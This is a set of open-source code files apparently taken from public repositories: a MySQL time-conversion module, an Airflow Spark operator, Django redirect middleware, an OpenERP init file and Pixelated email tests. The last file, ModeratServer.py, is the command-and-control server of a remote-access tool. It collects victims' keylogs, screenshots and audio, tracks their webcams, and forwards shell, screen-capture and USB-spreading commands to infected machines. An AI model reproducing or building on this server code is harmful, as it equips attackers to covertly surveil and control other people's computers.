DateTimeDeltaType = timedelta
DateTimeType = datetime
def DateFromTicks(ticks):
    """Convert UNIX ticks into a date instance (interpreted in local time)."""
    year, month, day = localtime(ticks)[:3]
    return date(year, month, day)
def TimeFromTicks(ticks):
    """Convert UNIX ticks into a time instance (local time, whole seconds)."""
    hour, minute, second = localtime(ticks)[3:6]
    return time(hour, minute, second)
def TimestampFromTicks(ticks):
    """Convert UNIX ticks into a datetime instance (local time, second resolution)."""
    fields = localtime(ticks)[:6]
    return datetime(*fields)
# TIME and DATE values are rendered via their str() form.
format_TIME = format_DATE = str

def format_TIMEDELTA(v):
    """Format a timedelta as MySQL's 'days hours:minutes:seconds' string."""
    # timedelta normalizes so 0 <= v.seconds < 86400; split it into h/m/s.
    minutes, seconds = divmod(int(v.seconds), 60)
    hours, minutes = divmod(minutes, 60)
    return '%d %d:%d:%d' % (v.days, hours, minutes, seconds)
def format_TIMESTAMP(d):
    """Render a datetime as 'YYYY-MM-DD HH:MM:SS[.ffffff]' (ISO with a space)."""
    # The date part never contains 'T', so replacing the first occurrence
    # swaps exactly the ISO date/time separator.
    return d.isoformat().replace('T', ' ', 1)
def DateTime_or_None(s):
    """Parse a MySQL DATETIME string into a datetime, or return None.

    Accepts either ' ' or 'T' as the date/time separator.  Fractional
    seconds are truncated (not rounded) to microsecond precision, so
    values with more than six fractional digits no longer fail to parse.
    Strings without a time part are delegated to Date_or_None().
    """
    if ' ' in s:
        sep = ' '
    elif 'T' in s:
        sep = 'T'
    else:
        return Date_or_None(s)
    try:
        d, t = s.split(sep, 1)
        if '.' in t:
            t, ms = t.split('.', 1)
            # Keep at most microseconds; right-pad shorter fractions with
            # zeros.  Previously a fraction longer than 6 digits produced a
            # microsecond value > 999999 and the whole parse returned None.
            ms = ms[:6].ljust(6, '0')
        else:
            ms = 0
        return datetime(*[ int(x) for x in d.split('-')+t.split(':')+[ms] ])
    except (ValueError, TypeError):
        # Non-numeric fields, out-of-range components, or a wrong number of
        # fields: fall back to a plain DATE parse (itself None on failure).
        return Date_or_None(s)
def TimeDelta_or_None(s):
    """Parse a MySQL TIME string ('[-]HH:MM:SS[.ffffff]') into a timedelta.

    Returns None if the string is malformed.  The sign is detected from the
    string itself, so '-00:30:00' correctly yields minus thirty minutes
    (the old `int(h) < 0` check missed a negative zero hour field).
    """
    try:
        h, m, s = s.split(':')
        if '.' in s:
            s, ms = s.split('.')
            ms = ms.ljust(6, '0')
        else:
            ms = 0
        negative = h.startswith('-')
        h, m, s, ms = abs(int(h)), int(m), int(s), int(ms)
        td = timedelta(hours=h, minutes=m, seconds=s,
                       microseconds=ms)
        return -td if negative else td
    except ValueError:
        # unpacking or int/float conversion failed
        return None
def Time_or_None(s):
    """Parse an 'HH:MM:SS[.ffffff]' string into a datetime.time, or None."""
    try:
        hours, minutes, rest = s.split(':')
        if '.' in rest:
            rest, frac = rest.split('.')
            frac = frac.ljust(6, '0')
        else:
            frac = 0
        return time(hour=int(hours), minute=int(minutes),
                    second=int(rest), microsecond=int(frac))
    except ValueError:
        # Wrong field count or non-numeric / out-of-range components.
        return None
def Date_or_None(s):
    """Parse a 'YYYY-MM-DD' string into a datetime.date, or None on failure."""
    try:
        year, month, day = (int(part) for part in s.split('-', 2))
        return date(year, month, day)
    except (SystemExit, KeyboardInterrupt):
        raise
    except:
        # Anything unparsable — wrong field count, non-numeric fields,
        # out-of-range dates — maps to SQL NULL.
        return None
def DateTime2literal(d, c):
    """Format a DateTime object as an ISO timestamp.

    `c` is the connection's conversion dictionary, forwarded to
    string_literal() for SQL quoting.
    """
    return string_literal(format_TIMESTAMP(d),c)
def DateTimeDelta2literal(d, c):
    """Format a DateTimeDelta object as a time.

    `c` is the connection's conversion dictionary, forwarded to
    string_literal() for SQL quoting.
    """
    return string_literal(format_TIMEDELTA(d),c)
def mysql_timestamp_converter(s):
    """Convert a MySQL TIMESTAMP column value to a Timestamp object.

    Handles both the modern DATETIME-style format (MySQL > 4.1, detected by
    the '-' after the year) and the legacy packed 'YYYYMMDDhhmmss' digit
    string, which is zero-padded on the right before slicing.
    """
    if s[4] == '-':
        # MySQL > 4.1 returns TIMESTAMP in the same format as DATETIME.
        return DateTime_or_None(s)
    padded = s.ljust(14, '0')
    chunks = (padded[0:4], padded[4:6], padded[6:8],
              padded[8:10], padded[10:12], padded[12:14])
    fields = [int(chunk) for chunk in chunks if chunk]
    try:
        return Timestamp(*fields)
    except (SystemExit, KeyboardInterrupt):
        raise
    except:
        return None
| mit |
Tagar/incubator-airflow | airflow/contrib/operators/spark_submit_operator.py | 2 | 7012 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from airflow.contrib.hooks.spark_submit_hook import SparkSubmitHook
from airflow.models import BaseOperator
from airflow.settings import WEB_COLORS
from airflow.utils.decorators import apply_defaults
class SparkSubmitOperator(BaseOperator):
    """
    This operator wraps the spark-submit binary to kick off a spark-submit job.
    It requires that the "spark-submit" binary is in the PATH or the spark-home is set
    in the extra on the connection.
    :param application: The application that submitted as a job, either jar or py file.
    :type application: str
    :param conf: Arbitrary Spark configuration properties
    :type conf: dict
    :param conn_id: The connection id as configured in Airflow administration. When an
                    invalid connection_id is supplied, it will default to yarn.
    :type conn_id: str
    :param files: Upload additional files to the executor running the job, separated by a
                  comma. Files will be placed in the working directory of each executor.
                  For example, serialized objects.
    :type files: str
    :param py_files: Additional python files used by the job, can be .zip, .egg or .py.
    :type py_files: str
    :param jars: Submit additional jars to upload and place them in executor classpath.
    :type jars: str
    :param driver_classpath: Additional, driver-specific, classpath settings.
    :type driver_classpath: str
    :param java_class: the main class of the Java application
    :type java_class: str
    :param packages: Comma-separated list of maven coordinates of jars to include on the
                     driver and executor classpaths
    :type packages: str
    :param exclude_packages: Comma-separated list of maven coordinates of jars to exclude
                             while resolving the dependencies provided in 'packages'
    :type exclude_packages: str
    :param repositories: Comma-separated list of additional remote repositories to search
                         for the maven coordinates given with 'packages'
    :type repositories: str
    :param total_executor_cores: (Standalone & Mesos only) Total cores for all executors
                                 (Default: all the available cores on the worker)
    :type total_executor_cores: int
    :param executor_cores: (Standalone & YARN only) Number of cores per executor
                           (Default: 2)
    :type executor_cores: int
    :param executor_memory: Memory per executor (e.g. 1000M, 2G) (Default: 1G)
    :type executor_memory: str
    :param driver_memory: Memory allocated to the driver (e.g. 1000M, 2G) (Default: 1G)
    :type driver_memory: str
    :param keytab: Full path to the file that contains the keytab
    :type keytab: str
    :param principal: The name of the kerberos principal used for keytab
    :type principal: str
    :param name: Name of the job (default airflow-spark)
    :type name: str
    :param num_executors: Number of executors to launch
    :type num_executors: int
    :param application_args: Arguments for the application being submitted
    :type application_args: list
    :param verbose: Whether to pass the verbose flag to spark-submit process for debugging
    :type verbose: bool
    """
    # These fields are rendered with Jinja templates before execution.
    template_fields = ('_name', '_application_args', '_packages')
    ui_color = WEB_COLORS['LIGHTORANGE']
    @apply_defaults
    def __init__(self,
                 application='',
                 conf=None,
                 conn_id='spark_default',
                 files=None,
                 py_files=None,
                 driver_classpath=None,
                 jars=None,
                 java_class=None,
                 packages=None,
                 exclude_packages=None,
                 repositories=None,
                 total_executor_cores=None,
                 executor_cores=None,
                 executor_memory=None,
                 driver_memory=None,
                 keytab=None,
                 principal=None,
                 name='airflow-spark',
                 num_executors=None,
                 application_args=None,
                 verbose=False,
                 *args,
                 **kwargs):
        # All arguments are stored as-is and only handed to SparkSubmitHook
        # at execution time, after template rendering has taken place.
        super(SparkSubmitOperator, self).__init__(*args, **kwargs)
        self._application = application
        self._conf = conf
        self._files = files
        self._py_files = py_files
        self._driver_classpath = driver_classpath
        self._jars = jars
        self._java_class = java_class
        self._packages = packages
        self._exclude_packages = exclude_packages
        self._repositories = repositories
        self._total_executor_cores = total_executor_cores
        self._executor_cores = executor_cores
        self._executor_memory = executor_memory
        self._driver_memory = driver_memory
        self._keytab = keytab
        self._principal = principal
        self._name = name
        self._num_executors = num_executors
        self._application_args = application_args
        self._verbose = verbose
        # The hook is created lazily in execute(); on_kill() relies on it.
        self._hook = None
        self._conn_id = conn_id
    def execute(self, context):
        """
        Call the SparkSubmitHook to run the provided spark job
        """
        self._hook = SparkSubmitHook(
            conf=self._conf,
            conn_id=self._conn_id,
            files=self._files,
            py_files=self._py_files,
            driver_classpath=self._driver_classpath,
            jars=self._jars,
            java_class=self._java_class,
            packages=self._packages,
            exclude_packages=self._exclude_packages,
            repositories=self._repositories,
            total_executor_cores=self._total_executor_cores,
            executor_cores=self._executor_cores,
            executor_memory=self._executor_memory,
            driver_memory=self._driver_memory,
            keytab=self._keytab,
            principal=self._principal,
            name=self._name,
            num_executors=self._num_executors,
            application_args=self._application_args,
            verbose=self._verbose
        )
        self._hook.submit(self._application)
    def on_kill(self):
        # Delegate task-kill to the hook so the spark-submit subprocess
        # (and the YARN/k8s job, where applicable) is terminated.
        self._hook.on_kill()
| apache-2.0 |
carlmw/oscar-wager | django/contrib/redirects/middleware.py | 447 | 1105 | from django.contrib.redirects.models import Redirect
from django import http
from django.conf import settings
class RedirectFallbackMiddleware(object):
    """On 404 responses, consult the Redirect table for the current site.

    A matching redirect with an empty new path answers 410 Gone; otherwise
    a permanent redirect to the stored target is returned.
    """

    def _find_redirect(self, old_path):
        # Look up a redirect for this site, returning None when absent.
        try:
            return Redirect.objects.get(site__id__exact=settings.SITE_ID,
                                        old_path=old_path)
        except Redirect.DoesNotExist:
            return None

    def process_response(self, request, response):
        if response.status_code != 404:
            # Only 404s fall through to the redirect table.
            return response
        path = request.get_full_path()
        redirect = self._find_redirect(path)
        if redirect is None and settings.APPEND_SLASH:
            # Retry with the last slash removed (usually the trailing one).
            cut = path.rfind('/')
            redirect = self._find_redirect(path[:cut] + path[cut + 1:])
        if redirect is None:
            # No redirect was found; leave the 404 untouched.
            return response
        if redirect.new_path == '':
            return http.HttpResponseGone()
        return http.HttpResponsePermanentRedirect(redirect.new_path)
| bsd-3-clause |
hbrunn/OpenUpgrade | addons/base_report_designer/__init__.py | 421 | 1136 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import wizard
import base_report_designer
import installer
import openerp_sxw2rml
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
pixelated/pixelated-user-agent | service/test/integration/test_mark_as_read_unread.py | 2 | 4293 | #
# Copyright (c) 2014 ThoughtWorks, Inc.
#
# Pixelated is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pixelated is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Pixelated. If not, see <http://www.gnu.org/licenses/>.
from twisted.internet import defer
from test.support.integration import SoledadTestBase, MailBuilder
from pixelated.adapter.model.status import Status
class MarkAsReadUnreadTest(SoledadTestBase):
    """Integration tests for toggling the 'read' status flag on mails."""
    @defer.inlineCallbacks
    def test_mark_single_as_read(self):
        input_mail = MailBuilder().build_input_mail()
        mail = yield self.app_test_client.add_mail_to_inbox(input_mail)
        mails = yield self.app_test_client.get_mails_by_tag('inbox')
        self.assertNotIn('read', mails[0].status)
        yield self.app_test_client.mark_many_as_read([mail.ident])
        mails = yield self.app_test_client.get_mails_by_tag('inbox')
        self.assertIn('read', mails[0].status)
    @defer.inlineCallbacks
    def test_mark_single_as_unread(self):
        input_mail = MailBuilder().build_input_mail()
        mail = yield self.app_test_client.add_mail_to_inbox(input_mail)
        yield self.app_test_client.mark_many_as_read([mail.ident])
        yield self.app_test_client.mark_many_as_unread([mail.ident])
        result = (yield self.app_test_client.get_mails_by_tag('inbox'))[0]
        self.assertNotIn('read', result.status)
    @defer.inlineCallbacks
    def test_mark_many_mails_as_unread(self):
        input_mail = MailBuilder().with_status([Status.SEEN]).build_input_mail()
        input_mail2 = MailBuilder().with_status([Status.SEEN]).build_input_mail()
        mail1 = yield self.app_test_client.add_mail_to_inbox(input_mail)
        mail2 = yield self.app_test_client.add_mail_to_inbox(input_mail2)
        yield self.app_test_client.mark_many_as_read([mail1.ident, mail2.ident])
        yield self.app_test_client.mark_many_as_unread([mail1.ident, mail2.ident])
        mails = yield self.app_test_client.get_mails_by_tag('inbox')
        self.assertNotIn('read', mails[0].status)
        self.assertNotIn('read', mails[1].status)
    @defer.inlineCallbacks
    def test_mark_many_mails_as_read(self):
        input_mail = MailBuilder().build_input_mail()
        input_mail2 = MailBuilder().build_input_mail()
        yield self.app_test_client.add_mail_to_inbox(input_mail)
        yield self.app_test_client.add_mail_to_inbox(input_mail2)
        mails = yield self.app_test_client.get_mails_by_tag('inbox')
        self.assertNotIn('read', mails[0].status)
        self.assertNotIn('read', mails[1].status)
        yield self.app_test_client.mark_many_as_read([mails[0].ident, mails[1].ident])
        mails = yield self.app_test_client.get_mails_by_tag('inbox')
        self.assertIn('read', mails[0].status)
        self.assertIn('read', mails[1].status)
    @defer.inlineCallbacks
    def test_mark_mixed_status_as_read(self):
        input_mail = MailBuilder().with_subject('first').build_input_mail()
        input_mail2 = MailBuilder().with_subject('second').build_input_mail()
        yield self.app_test_client.add_mail_to_inbox(input_mail)
        mail2 = yield self.app_test_client.add_mail_to_inbox(input_mail2)
        yield self.app_test_client.mark_many_as_read([mail2.ident])
        mails = yield self.app_test_client.get_mails_by_tag('inbox')
        # List comprehensions instead of len(filter(lambda ...)): filter()
        # returns an iterator on Python 3, which has no len(); behaviour on
        # Python 2 is identical.
        read_mails = [mail for mail in mails if 'read' in mail.status]
        unread_mails = [mail for mail in mails if 'read' not in mail.status]
        self.assertEquals(1, len(unread_mails))
        self.assertEquals(1, len(read_mails))
        yield self.app_test_client.mark_many_as_read([mails[0].ident, mails[1].ident])
        mails = yield self.app_test_client.get_mails_by_tag('inbox')
        self.assertIn('read', mails[0].status)
        self.assertIn('read', mails[1].status)
| agpl-3.0 |
Swordf1sh/Moderat | Server/ModeratServer.py | 1 | 21574 | import ast
import logging
import coloredlogs
import os
import datetime
import time
from twisted.internet.protocol import ServerFactory
from twisted.internet import task
from twisted.protocols.basic import LineReceiver
from db.DatabaseManagment import MDB
from commands import client
class ModeratServerProtocol(LineReceiver):
delimiter = '[ENDOFMESSAGE]'
MAX_LENGTH = 1024 * 1024 * 100 # 100MB
def __init__(self):
# dicts for download
self.screenshots_dict = {}
self.keylogs_dict = {}
self.audio_dict = {}
    def rawDataReceived(self, data):
        # Required LineReceiver override; raw mode is never entered here,
        # so any raw data is deliberately ignored.
        pass
    # New Connection Made
    def connectionMade(self):
        # Handshake: acknowledge the accepted TCP connection to the peer.
        self.send_message(self, 'connectSuccess', 'connectSuccess')
    def connectionLost(self, reason):
        """Tear down the transport and drop this socket's registry entries."""
        self.transport.abortConnection()
        # Delete Socket Entry
        # NOTE(review): dict.has_key() and deleting entries while looping
        # over .items() only work on Python 2 (where .items() is a copy);
        # confirm before porting to Python 3.
        for key, value in self.factory.clients.items():
            if value['socket'] == self:
                # Persist the offline state, then drop the live entry.
                self.factory.database.set_client_offline(key)
                del self.factory.clients[key]
                self.factory.log.warning('[CLIENT] Client (%s) Disconnected' % (value['key'] if value.has_key('key') else 'UNKNOWN'))
        # Delete Moderator Entry
        try:
            for key, value in self.factory.moderators.items():
                if value['socket'] == self:
                    # Set Moderator Offline
                    self.factory.database.set_status(value['username'], 0)
                    self.factory.log.warning('[MODERATOR] Moderator (%s) Disconnected' % value['username'])
                    del self.factory.moderators[key]
        except KeyError:
            pass
    def lineLengthExceeded(self, line):
        # A peer sent more than MAX_LENGTH bytes in a single frame; log it
        # and let LineReceiver drop the connection/data as configured.
        self.factory.log.warning('[SERVER] Data Length Exceeded from {}'.format(self.transport.getPeer().host))
def lineReceived(self, line):
try:
command = ast.literal_eval(line)
except SyntaxError:
return
# Switch to client commands
if command['from'] == 'client':
if not command['mode'] == 'infoChecker':
self.factory.log.info('[*RECV] [Client: %s] [Mode: (%s)]' % (self.transport.getPeer().host, command['mode']))
if command.has_key('module_id'):
client.CheckCommand(self, command['payload'], command['mode'], command['session_id'], command['key'],
command['module_id'])
else:
client.CheckCommand(self, command['payload'], command['mode'], command['session_id'], command['key'], '')
# Switch to moderator commands
elif command['from'] == 'moderator':
if not command['mode'] == 'getModerators' and not command['mode'] == 'getClients':
self.factory.log.info('[*RECV] [Moderator: %s] [Mode: (%s)]' % (self.transport.getPeer().host, command['mode']))
self.moderator_commands(command['payload'], command['mode'], command['session_id'], command['to'],
command['module_id'])
# Moderator Commands
def moderator_commands(self, payload, mode, session_id, client_key, module_id):
    """Dispatch a moderator message by *mode*.

    'moderatorInitializing' performs login; every other mode requires an
    already-registered session_id in self.factory.moderators.  Admin-only
    modes additionally require privilege level 1.
    """
    if mode == 'moderatorInitializing':
        # Initializing Moderator
        self.factory.log.debug('[MODERATOR] Initializing Moderator [FROM: %s]' % self.transport.getPeer().host)
        if payload.startswith('auth '):
            credentials = payload.split()
            if len(credentials) == 3:
                command, username, password = payload.split()
                # If Login Success
                if self.factory.database.login_user(username, password):
                    privileges = self.factory.database.get_privs(username)
                    self.send_message(self, 'loginSuccess %s' % privileges, 'moderatorInitializing')
                    self.factory.moderators[session_id] = {'username': username, 'socket': self}
                    self.factory.database.set_last_online(username, datetime.datetime.now())
                    self.factory.database.set_status(username, 1)
                    self.factory.log.debug('[MODERATOR] Moderator (%s) Login Success' % username)
                # if Login Not Success
                else:
                    self.send_message(self, 'loginError', 'moderatorInitializing')
                    self.factory.log.error('[MODERATOR] Moderator (%s) Login Error' % username)
            else:
                self.factory.log.critical('[MALFORMED] Moderator Login Data')
    # Initialized Moderator ('in' replaces the deprecated dict.has_key)
    elif session_id in self.factory.moderators:
        moderator_username = self.factory.moderators[session_id]['username']
        if mode == 'getClients' and session_id in self.factory.moderators:
            if self.factory.database.get_privs(moderator_username) == 1:
                # Admins see clients of every non-admin moderator plus their own.
                clients_ids = []
                temp_clients_ids = self.factory.database.get_all_clients()
                for client_id in temp_clients_ids:
                    _id = client_id[0]
                    if self.factory.database.get_privs(self.factory.database.get_moderator(
                            _id)) == 0 or moderator_username == self.factory.database.get_moderator(_id):
                        clients_ids.append(client_id)
            else:
                clients_ids = self.factory.database.get_clients(moderator_username)
            shared_clients = {}
            # for online clients
            for client_id in clients_ids:
                _id = client_id[0]
                # Online Clients ('in' replaces deprecated has_key)
                if _id in self.factory.clients and 'os_type' in self.factory.clients[_id]:
                    shared_clients[_id] = {
                        'moderator': self.factory.database.get_moderator(_id),
                        'alias': self.factory.database.get_alias(_id),
                        'ip_address': self.factory.clients[_id]['ip_address'],
                        'os_type': self.factory.clients[_id]['os_type'],
                        'os': self.factory.clients[_id]['os'],
                        'user': self.factory.clients[_id]['user'],
                        'privileges': self.factory.clients[_id]['privileges'],
                        'audio_device': self.factory.clients[_id]['audio_device'],
                        'webcamera_device': self.factory.clients[_id]['webcamera_device'],
                        'window_title': self.factory.clients[_id]['window_title'],
                        'key': self.factory.clients[_id]['key'],
                        'kts': self.factory.clients[_id]['kts'],
                        'kt': self.factory.clients[_id]['kt'],
                        'ats': self.factory.clients[_id]['ats'],
                        'at': self.factory.clients[_id]['at'],
                        'sts': self.factory.clients[_id]['sts'],
                        'std': self.factory.clients[_id]['std'],
                        'st': self.factory.clients[_id]['st'],
                        'usp': self.factory.clients[_id]['usp'],
                        'status': True
                    }
                # Offline Clients
                else:
                    shared_clients[_id] = {
                        'moderator': self.factory.database.get_moderator(_id),
                        'key': _id,
                        'alias': self.factory.database.get_alias(_id),
                        'ip_address': self.factory.database.get_ip_address(_id),
                        'last_online': self.factory.database.get_last_online(_id),
                        'status': False
                    }
            self.send_message(self, shared_clients, 'getClients')
        # Note Save Mode
        elif mode == 'saveNote':
            splitted = payload.split('%SPLITTER%')
            if len(splitted) == 2:
                client_id, note_body = splitted
                self.factory.database.save_note(client_id, note_body)
        # Get Note
        elif mode == 'getNote':
            self.send_message(self, '{}'.format(self.factory.database.get_note(payload)), mode, module_id=module_id)
        # Set Alias For Client
        elif mode == 'setAlias':
            alias_data = payload.split()
            try:
                alias_client = alias_data[0]
                alias_value = u' '.join(alias_data[1:])
                self.factory.log.debug('[MODERATOR][{0}] Add Alias ({1}) for ({2})'.format(moderator_username, alias_value,
                                                                                           self.transport.getPeer().host))
                self.factory.database.set_alias(alias_client, alias_value)
            except Exception:
                # Was a bare except; Exception still covers empty payloads and
                # database errors without masking KeyboardInterrupt/SystemExit.
                self.factory.log.critical('[MALFORMED][{0}] [MODE: {1}]'.format(moderator_username, mode))
        elif mode == 'removeClient':
            client = payload
            self.factory.database.delete_client(client)
            self.factory.log.debug('[MODERATOR][{0}] Client ({1}) Removed'.format(moderator_username, client))
        elif mode == 'countData':
            screen_data = payload.split()
            if len(screen_data) == 2:
                client_id, date = screen_data
                # New (unviewed, *_0) vs. old (viewed, *_1) counts per log type.
                counted_data = {
                    'screenshots': {
                        'new': self.factory.database.get_screenshots_count_0(client_id, date),
                        'old': self.factory.database.get_screenshots_count_1(client_id, date)
                    },
                    'keylogs': {
                        'new': self.factory.database.get_keylogs_count_0(client_id, date),
                        'old': self.factory.database.get_keylogs_count_1(client_id, date)
                    },
                    'audio': {
                        'new': self.factory.database.get_audios_count_0(client_id, date),
                        'old': self.factory.database.get_audios_count_1(client_id, date)
                    }
                }
                self.send_message(self, counted_data, mode, module_id=module_id)
            else:
                self.factory.log.critical('[MALFORMED][{0}] [MODE: {1}]'.format(moderator_username, mode))
        elif mode == 'downloadLogs':
            if type(payload) == dict:
                download_info = payload
                # Get All Logs ('filter' selects only-new vs. all entries)
                if download_info['screenshot']:
                    screenshots = self.factory.database.get_all_new_screenshots(download_info['client_id'],
                                                                                download_info['date']) \
                        if download_info['filter'] else self.factory.database.get_all_screenshots(
                        download_info['client_id'], download_info['date'])
                else:
                    screenshots = []
                if download_info['keylog']:
                    keylogs = self.factory.database.get_all_new_keylogs(download_info['client_id'], download_info['date']) \
                        if download_info['filter'] else self.factory.database.get_all_keylogs(download_info['client_id'],
                                                                                              download_info['date'])
                else:
                    keylogs = []
                if download_info['audio']:
                    audios = self.factory.database.get_all_new_audios(download_info['client_id'], download_info['date']) \
                        if download_info['filter'] else self.factory.database.get_all_audios(download_info['client_id'],
                                                                                             download_info['date'])
                else:
                    audios = []
                # Send Counted Logs
                counted_logs = {
                    'screenshots': len(screenshots),
                    'keylogs': len(keylogs),
                    'audios': len(audios),
                }
                self.send_message(self, counted_logs, mode, module_id=module_id)
                # Start Send Screenshots
                for screenshot in screenshots:
                    if os.path.exists(screenshot[2]):
                        screenshot_info = {
                            'type': 'screenshot',
                            'datetime': screenshot[1],
                            'raw': open(screenshot[2], 'rb').read(),
                            'window_title': screenshot[3],
                            'date': screenshot[4]
                        }
                        self.send_message(self, screenshot_info, 'downloadLog', module_id=module_id)
                        self.factory.database.set_screenshot_viewed(screenshot[1])
                    else:
                        self.factory.log.info('[SERVER] File Not Found Delete Entry (%s)' % screenshot[2])
                        self.factory.database.delete_screenshot(screenshot[1])
                # Start Send Keylogs
                for keylog in keylogs:
                    if os.path.exists(keylog[3]):
                        keylog_info = {
                            'type': 'keylog',
                            'datetime': keylog[1],
                            'date': keylog[2],
                            'raw': open(keylog[3], 'rb').read()
                        }
                        self.send_message(self, keylog_info, 'downloadLog', module_id=module_id)
                        self.factory.database.set_keylog_viewed(keylog[1])
                    else:
                        self.factory.log.info('[SERVER] File Not Found Delete Entry (%s)' % keylog[3])
                        self.factory.database.delete_keylog(keylog[1])
                # Start Send Audios
                for audio in audios:
                    if os.path.exists(audio[3]):
                        audio_info = {
                            'type': 'audio',
                            'datetime': audio[1],
                            'date': audio[2],
                            'raw': open(audio[3], 'rb').read()
                        }
                        self.send_message(self, audio_info, 'downloadLog', module_id=module_id)
                        self.factory.database.set_audio_viewed(audio[1])
                    else:
                        self.factory.log.info('[SERVER] File Not Found Delete Entry (%s)' % audio[3])
                        self.factory.database.delete_audios(audio[1])
                self.send_message(self, {'type': 'endDownloading', }, 'downloadLog', module_id=module_id)
            else:
                self.factory.log.critical('[MALFORMED][TYPE] [MODE: {0}] [TYPE: {1}]'.format(mode, type(payload)))
        # Get Moderators List
        elif mode == 'getModerators' and self.factory.database.get_privs(moderator_username) == 1:
            all_moderators = self.factory.database.get_moderators()
            result = {}
            for moderator in all_moderators:
                all_clients_count = len(self.factory.database.get_clients(moderator[0]))
                offline_clients_count = len(self.factory.database.get_offline_clients(moderator[0]))
                result[moderator[0]] = {
                    'privileges': moderator[2],
                    'offline_clients': offline_clients_count,
                    'online_clients': all_clients_count - offline_clients_count,
                    'status': moderator[3],
                    'last_online': moderator[4],
                }
            self.send_message(self, result, 'getModerators')
        # ADMIN PRIVILEGES
        # Add Moderator
        elif mode == 'addModerator' and self.factory.database.get_privs(moderator_username) == 1:
            credentials = payload.split()
            if len(credentials) == 3:
                username, password, privileges = credentials
                self.factory.database.create_user(username, password, int(privileges))
                self.factory.log.debug('[MODERATOR][{0}] ({1}) Created With Password: ({2}), Privileges: ({3})'.format(
                    moderator_username, username, password.replace(password[3:], '***'), privileges))
        elif mode == 'setModerator' and self.factory.database.get_privs(moderator_username) == 1:
            credentials = payload.split()
            if len(credentials) == 2:
                client_id, moderator_id = credentials
                self.factory.database.set_moderator(client_id, moderator_id)
                self.factory.log.debug('[MODERATOR][{0}] Moderator Changed For Client ({1}) to ({2})'.format(
                    moderator_username, client_id, moderator_id))
        elif mode == 'changePassword' and self.factory.database.get_privs(moderator_username) == 1:
            credentials = payload.split()
            if len(credentials) == 2:
                moderator_id, new_password = credentials
                self.factory.database.change_password(moderator_id, new_password)
                self.factory.log.debug('[MODERATOR][{0}] Moderator ({1}) Password Changed to ({2})'.format(
                    moderator_username, moderator_id, new_password.replace(new_password[3:], '***')))
        elif mode == 'changePrivilege' and self.factory.database.get_privs(moderator_username) == 1:
            credentials = payload.split()
            if len(credentials) == 2:
                moderator_id, new_privilege = credentials
                self.factory.database.change_privileges(moderator_id, new_privilege)
                self.factory.log.debug('[MODERATOR][{0}] Moderator ({1}) Privilege Changed to ({2})'.format(
                    moderator_username, moderator_id, new_privilege))
        elif mode == 'removeModerator' and self.factory.database.get_privs(moderator_username) == 1:
            moderator_id = payload
            self.factory.database.delete_user(moderator_id)
            self.factory.log.debug('[MODERATOR][{0}] Moderator ({1}) Removed'.format(
                moderator_username, moderator_id))
        # For Only Administrators
        elif mode in ['terminateClient'] and self.factory.database.get_privs(moderator_username) == 1:
            self.send_message(self.factory.clients[client_key]['socket'], payload, mode,
                              session_id=session_id)
        # Forward To Client
        elif mode in ['getScreen', 'getWebcam', 'setLogSettings', 'updateSource', 'p2pMode',
                      'shellMode', 'explorerMode', 'terminateProcess', 'scriptingMode', 'usbSpreading']:
            try:
                self.send_message(self.factory.clients[client_key]['socket'], payload, mode,
                                  session_id=session_id, module_id=module_id)
            except KeyError:
                # Target client not connected; drop the request silently.
                pass
        else:
            # Fixed: the original passed (moderator_username, mode) to a
            # format string labelled [MODE: {0}] [MODERATOR: {1}].
            self.factory.log.critical('[MALFORMED][MODE] [MODE: {0}] [MODERATOR: {1}]'.format(mode, moderator_username))
    else:
        self.factory.log.critical('[MALFORMED][SESSION] [MODE: {0}] [SESSION: {1}]'.format(mode, session_id))
# Send Message To Client
def send_message(self, to, message, mode, session_id='', module_id='', end='[ENDOFMESSAGE]'):
    """Serialize a message dict with str() and write it to *to*'s transport.

    *to* is another protocol instance (possibly self); *end* is the frame
    delimiter.  NOTE(review): the peer appears to decode this with
    ast.literal_eval (see lineReceived) - the dict's str() form is the
    wire format.
    """
    # Send Data Function
    to.transport.write(str({
        'payload': message,
        'mode': mode,
        'from': 'server',
        'session_id': session_id,
        'module_id': module_id,
    }) + end)
    self.factory.log.info('[*SENT] [TO: %s] [FROM: %s] [MODE: %s]' % (
        to.transport.getPeer().host, self.transport.getPeer().host, mode))
class ModeratServerFactory(ServerFactory):
    """Twisted factory holding the shared server state.

    NOTE(review): the class body below runs at import time, including the
    database status resets and the coloredlogs installation.
    """

    # Custom Colored Logging
    log = logging.getLogger('Moderat')
    coloredlogs.install(level='DEBUG')

    # Root directory for stored log artifacts (screenshots/keylogs/audio).
    DATA_STORAGE = r'/media/root/STORAGE/MODERAT_DATA/'
    database = MDB()

    # Clear Clients and Moderators Status
    database.set_client_status_zero()
    database.set_moderator_status_zero()

    # session_id -> {'username': ..., 'socket': ...}
    moderators = {}
    # client_id -> per-client info dict ('socket', plus metadata once known)
    clients = {}

    log.debug('[SERVER] Moderat Server Started')

    protocol = ModeratServerProtocol

